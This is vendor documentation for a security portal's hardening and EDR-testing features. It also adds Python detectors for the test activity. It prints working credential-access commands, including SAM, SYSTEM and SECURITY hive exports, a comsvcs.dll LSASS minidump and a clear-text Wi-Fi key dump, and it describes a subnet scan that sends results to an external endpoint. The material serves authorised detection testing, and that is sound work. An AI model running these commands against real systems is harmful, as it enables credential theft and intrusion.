Hardening & Configuration Management
Last updated
Windows Hardening Results: This section displays the hardening results for client machines and servers. Benchmark controls are based on the CIS and DoD benchmarks, which are global standards. The Portal separates the results by risk score so that users get more accurate results after analysis. Users can remediate results for a single machine, a group, or all devices on the portal. Users can also trust a result by adding the rule to the classification rules. For hardening actions across multiple hosts, it is recommended to use the Windows Hardening Results by Name section.
Right-click and choose the "Remediation -> Remediate Security Control" option to remediate. A small modal then appears on the right side of the page, where users define the settings for the job.
Go to the "Security Assurance -> Remediation" page to see the remediation job. All jobs are displayed on that page.
Windows Hardening Results by Name: This section displays benchmark controls aggregated by name. The results are also grouped by risk score for better visibility. The same actions can be performed on this page.
Windows Security Controls Backup Values: This section allows users to roll back to the values that were in place before a remediation job was executed. The Portal always backs up every value it remediates.
Security Control Results: This section displays security control results by benchmark standard. Users can analyze and remediate the failed results.
Windows EDR Analysis: This section displays EDR testing scenario results. Users can analyze them and get feedback on the EDR coverage of their systems.
Windows DLP Analysis: This section displays DLP testing scenario results. Users can analyze them and get feedback on the DLP coverage of their systems.
For EDR analysis there are 8 different modes that change the type of action performed. The EDR analysis mode is changed through the EDR Policy. Each mode is described in detail below:
Basic: This mode runs a defined set of basic commands. These commands are:
"powershell "Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending"",
"powershell "netsh wlan show profiles | Select-String -Pattern 'All User Profile' -AllMatches | ForEach-Object { $_ -replace 'All User Profile *: ', '' } | ForEach-Object { netsh wlan show profile name=\"$_\" key=clear }"",
"powershell "Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate"",
"powershell "Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNSServer"",
"quser",
"net localgroup administrators",
"netsh firewall show all",
"net sessions",
"reg save hklm\sam ss.dat"
File Encryption: This mode encrypts files created on the host computer. These files are created from built-in files. The number of files is defined in the EDR policy; the default value is 10.
LSASS Dump: This mode tries to create a dump file for LSASS by using the command below:
"powershell -Command "$lsass = Get-Process -Name lsass; $lsassId = $lsass.Id; $dumpPath = 'C:\temp\out.dmp'; $command = 'rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ' + $lsassId + ' ' + $dumpPath + ' full'; Invoke-Expression $command""
Aggressive: This mode first runs predefined commands and then applies the action selected by the user in the policy. The Aggressive mode commands are:
"powershell "Get-Process | Select-Object -Property ProcessName, Id, CPU | Sort-Object -Property CPU -Descending"",
"powershell "netsh wlan show profiles | Select-String -Pattern 'All User Profile' -AllMatches | ForEach-Object { $_ -replace 'All User Profile *: ', '' } | ForEach-Object { netsh wlan show profile name=\"$_\" key=clear }"",
"powershell "Get-ADUser -Filter * -Properties * | Select-Object -Property Name, Enabled, LastLogonDate"",
"powershell "Get-NetIPConfiguration | Select-Object -Property InterfaceAlias, IPv4Address, IPv6Address, DNSServer"",
"quser",
"net localgroup administrators",
"netsh firewall show all",
"net sessions",
"reg save hklm\sam ss.dat",
"Reg.exe save HKLM\SYSTEM system.save",
"Reg.exe save HKLM\SECURITY security.save"
For the selected action, the agent first creates a file using built-in files and then, based on the selection, encrypts or deletes that file.
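The value of the Basic, LSASS Dump and Aggressive scenarios is in checking whether the EDR raised an alert on them. The following added example (not part of the Portal or this page) shows how a defender can score process-creation telemetry against the command patterns those modes run, so that a missed alert shows up as a coverage gap. The event records, rule names and severity labels are constructed for the example; the patterns themselves are taken from the command lists above.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events (command lines only), modelled on the
# commands listed for the Basic, LSASS Dump and Aggressive modes. Not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4120, "user": "LAB\\alice", "cmd": "reg save hklm\\sam ss.dat"},
    {"pid": 4133, "user": "LAB\\alice", "cmd": "Reg.exe save HKLM\\SYSTEM system.save"},
    {"pid": 4140, "user": "LAB\\alice",
     "cmd": "rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 712 C:\\temp\\out.dmp full"},
    {"pid": 4151, "user": "LAB\\alice", "cmd": 'netsh wlan show profile name="Office" key=clear'},
    {"pid": 4160, "user": "LAB\\bob", "cmd": "net localgroup administrators"},
    {"pid": 4171, "user": "LAB\\bob", "cmd": "notepad.exe C:\\Users\\bob\\notes.txt"},
]


@dataclass(frozen=True)
class Rule:
    name: str        # hypothetical rule name chosen for this example
    severity: str    # "high" = credential access, "medium" = discovery
    pattern: re.Pattern


# Detection rules derived from the command lists on this page.
RULES = [
    Rule("registry-hive-export", "high",
         re.compile(r"\breg(?:\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    Rule("lsass-minidump-comsvcs", "high",
         re.compile(r"comsvcs\.dll\s*,\s*MiniDump\b", re.I)),
    Rule("wlan-key-clear", "high",
         re.compile(r"netsh\s+wlan\s+show\s+profile\b.*\bkey=clear\b", re.I)),
    Rule("local-admins-enum", "medium",
         re.compile(r"\bnet\s+localgroup\s+administrators\b", re.I)),
    Rule("ad-user-dump", "medium",
         re.compile(r"Get-ADUser\s+-Filter\s+\*", re.I)),
    Rule("session-enum", "medium",
         re.compile(r"^\s*(quser|net\s+sessions?)\b", re.I)),
]


def match_rules(cmd):
    """Return every rule whose pattern matches the command line."""
    return [r for r in RULES if r.pattern.search(cmd)]


def score_events(events):
    """Produce one finding per (event, matching rule)."""
    findings = []
    for e in events:
        for r in match_rules(e["cmd"]):
            findings.append({"pid": e["pid"], "user": e["user"],
                             "rule": r.name, "severity": r.severity})
    return findings


def summarize(findings):
    """Count high/medium findings per user; a non-empty 'high' bucket with no
    EDR alert on the same host is a coverage gap worth investigating."""
    per_user = {}
    for f in findings:
        bucket = per_user.setdefault(f["user"], {"high": 0, "medium": 0})
        bucket[f["severity"]] += 1
    return per_user


if __name__ == "__main__":
    for f in score_events(SAMPLE_EVENTS):
        print(f)
    print(summarize(score_events(SAMPLE_EVENTS)))
```

Correlate the findings with the EDR's own alert log for the same host and time window: every "high" finding without a matching alert is a scenario the EDR did not see.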
C2: This mode first tries to enumerate user directories and then pings the local subnet for open ports. If any open ports are found, the agent tries to send the port information to a dummy API at "https://clapi.cloudcyte.com/console/public/api/externaldatatest".
Portscan: This mode pings the local subnet for open ports. If any open ports are found, the agent tries to send the port information to a dummy API at "https://clapi.cloudcyte.com/console/public/api/externaldatatest".
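Both the C2 and Portscan modes produce the same network footprint: one host touching many neighbours on the local subnet in a short time, followed (if anything is found) by an outbound HTTPS request to an external endpoint. The following added example (not part of the Portal or this page) is a small detector over firewall-style connection logs that flags a subnet sweep and notes any external follow-up connection, which is the signal a network sensor should raise during these scenarios. The log format, thresholds and addresses are constructed for the example; the Portal's own API hostname is deliberately not used.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime

# Constructed firewall-style connection log (one line per allowed connection).
# 10.0.5.21 probes 12 neighbours over 12 seconds, then connects out on 443;
# 10.0.5.30 is normal traffic. Not real data.
_SWEEP = [f"2024-05-01T10:00:{i:02d}Z src=10.0.5.21 dst=10.0.5.{i + 1} dport=445 proto=tcp"
          for i in range(12)]
SAMPLE_LOG = "\n".join(_SWEEP + [
    "2024-05-01T10:00:15Z src=10.0.5.21 dst=203.0.113.10 dport=443 proto=tcp",
    "2024-05-01T10:00:30Z src=10.0.5.30 dst=10.0.5.5 dport=445 proto=tcp",
    "2024-05-01T10:00:31Z src=10.0.5.30 dst=10.0.5.6 dport=445 proto=tcp",
    "2024-05-01T10:00:40Z src=10.0.5.30 dst=203.0.113.10 dport=443 proto=tcp",
])

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+src=(?P<src>\S+)\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)")

# Thresholds are example values; tune them to the size and chatter of the subnet.
SWEEP_DISTINCT_HOSTS = 10   # distinct internal targets from one source ...
SWEEP_WINDOW_S = 10         # ... within this many seconds counts as a sweep
FOLLOW_UP_WINDOW_S = 60     # external connections this soon after are reported

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip):
    """Treat RFC 1918 space as internal (stricter than ipaddress.is_private,
    which also counts documentation ranges such as 203.0.113.0/24)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918)


def parse(log_text):
    """Parse log lines into sorted event dicts; unparseable lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({"ts": datetime.fromisoformat(m["ts"].replace("Z", "+00:00")),
                       "src": m["src"], "dst": m["dst"], "dport": int(m["dport"])})
    events.sort(key=lambda e: e["ts"])
    return events


def detect_sweeps(events):
    """Sliding window per source: many distinct internal targets in a short
    time is a sweep; external connections shortly after are attached to it."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        internal = [e for e in evs if is_internal(e["dst"])]
        for i, start in enumerate(internal):
            window = [x for x in internal[i:]
                      if (x["ts"] - start["ts"]).total_seconds() <= SWEEP_WINDOW_S]
            targets = {x["dst"] for x in window}
            if len(targets) < SWEEP_DISTINCT_HOSTS:
                continue
            follow_up = sorted({x["dst"] for x in evs
                                if not is_internal(x["dst"])
                                and 0 <= (x["ts"] - start["ts"]).total_seconds() <= FOLLOW_UP_WINDOW_S})
            findings.append({"src": src, "first_seen": start["ts"].isoformat(),
                             "hosts_probed": len(targets), "external_follow_up": follow_up})
            break   # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for f in detect_sweeps(parse(SAMPLE_LOG)):
        print(f)
```

A sweep with a non-empty external_follow_up list is the C2 scenario; a sweep alone matches the Portscan scenario. If the network sensor stays silent on both while the Portal reports the scenario as executed, that is the coverage gap to record.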
Custom: This mode runs a custom script defined by the user in the EDR policy.
Stealth: This mode applies the actions selected by the user in the policy. For the selected action, the agent first creates a file using built-in files and then, based on the selection, encrypts or deletes that file.